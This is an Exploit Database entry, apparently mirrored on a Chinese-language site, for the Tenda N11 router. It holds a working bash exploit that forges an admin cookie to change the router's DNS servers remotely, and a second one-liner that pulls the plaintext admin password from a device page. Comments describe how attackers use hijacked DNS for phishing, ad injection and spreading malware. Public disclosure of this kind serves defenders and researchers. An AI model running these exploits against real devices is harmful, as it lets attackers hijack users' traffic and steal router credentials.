Tenda N11 Wireless Router 5.07.43_en_NEX01 – Remote DNS Change

• Exploit Database
• 16 阅读

• 作者： Todor Donev
  日期： 2018-03-28
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/44353/

• #!/bin/bash
  #
  #Tenda N11 Wireless Router V5.07.43_en_NEX01
  #Cookie Session Weakness Remote DNS Change PoC Exploit
  #
  #Copyright 2018 (c) Todor Donev <todor.donev at gmail.com>
  #https://ethical-hacker.org/
  #https://facebook.com/ethicalhackerorg
  #
  #Once modified, systems use foreign DNS servers,which are 
  #usually set up by cybercriminals. Users with vulnerable 
  #systems or devices who try to access certain sites are 
  #instead redirected to possibly malicious sites.
  #
  #Modifying systems' DNS settings allows cybercriminals to 
  #perform malicious activities like:
  #
  #oSteering unknowing users to bad sites: 
  # These sites can be phishing pages that 
  # spoof well-known sites in order to 
  # trick users into handing out sensitive 
  # information.
  #
  #oReplacing ads on legitimate sites: 
  # Visiting certain sites can serve users 
  # with infected systems a different set 
  # of ads from those whose systems are 
  # not infected.
  # 
  #oControlling and redirecting network traffic: 
  # Users of infected systems may not be granted 
  # access to download important OS and software 
  # updates from vendors like Microsoft and from 
  # their respective security vendors.
  #
  #oPushing additional malware: 
  # Infected systems are more prone to other 
  # malware infections (e.g., FAKEAV infection).
  #
  #Disclaimer:
  #This or previous programs is for Educational 
  #purpose ONLY. Do not use it without permission. 
  #The usual disclaimer applies, especially the 
  #fact that Todor Donev is not liable for any 
  #damages caused by direct or indirect use of the 
  #information or functionality provided by these 
  #programs. The author or any Internet provider 
  #bears NO responsibility for content or misuse 
  #of these programs or any derivatives thereof.
  #By using these programs you accept the fact 
  #that any damage (dataloss, system crash, 
  #system compromise, etc.) caused by the use 
  #of these programs is not Todor Donev's 
  #responsibility.
  # 
  #Use them at your own risk!
  #
  #
   
  if [[ $# -gt 3 || $# -lt 2 ]]; then
  echo "Tenda N11 Wireless Router V5.07.43_en_NEX01 "
  echo "Cookie Session Weakness Remote DNS Change PoC Exploit"
  echo "==========================================================="
  echo "Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
  echo "Example: $0 133.7.133.7 8.8.8.8"
  echo "Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
  echo ""
  echo "Copyright 2018 (c) Todor Donev <todor.donev at gmail.com>"
  echo "https://ethical-hacker.org/ https://fb.com/ethicalhackerorg"
  exit;
  fi
  GET=`which GET 2>/dev/null`
  if [ $? -ne 0 ]; then
  echo "Error : libwww-perl not found =/"
  exit;
  fi
  GET -H "Cookie: admin:language=en; path=/" "http://$1/goform/AdvSetDns?GO=wan_dns.asp&rebootTag=&DSEN=1&DNSEN=on&DS1=$2&DS2=$3" 2>/dev/null
  
  
  # Proof Of Concept 2:
  
  # [todor@paladium ~]$ GET "http://133.7.13.37:8080/advance.asp" | grep def_password= | sed 's/def_password=/ Password: /g'
  #Password: "Ethical-Hacker-Bulgaria-2o18";
  # [todor@paladium ~]$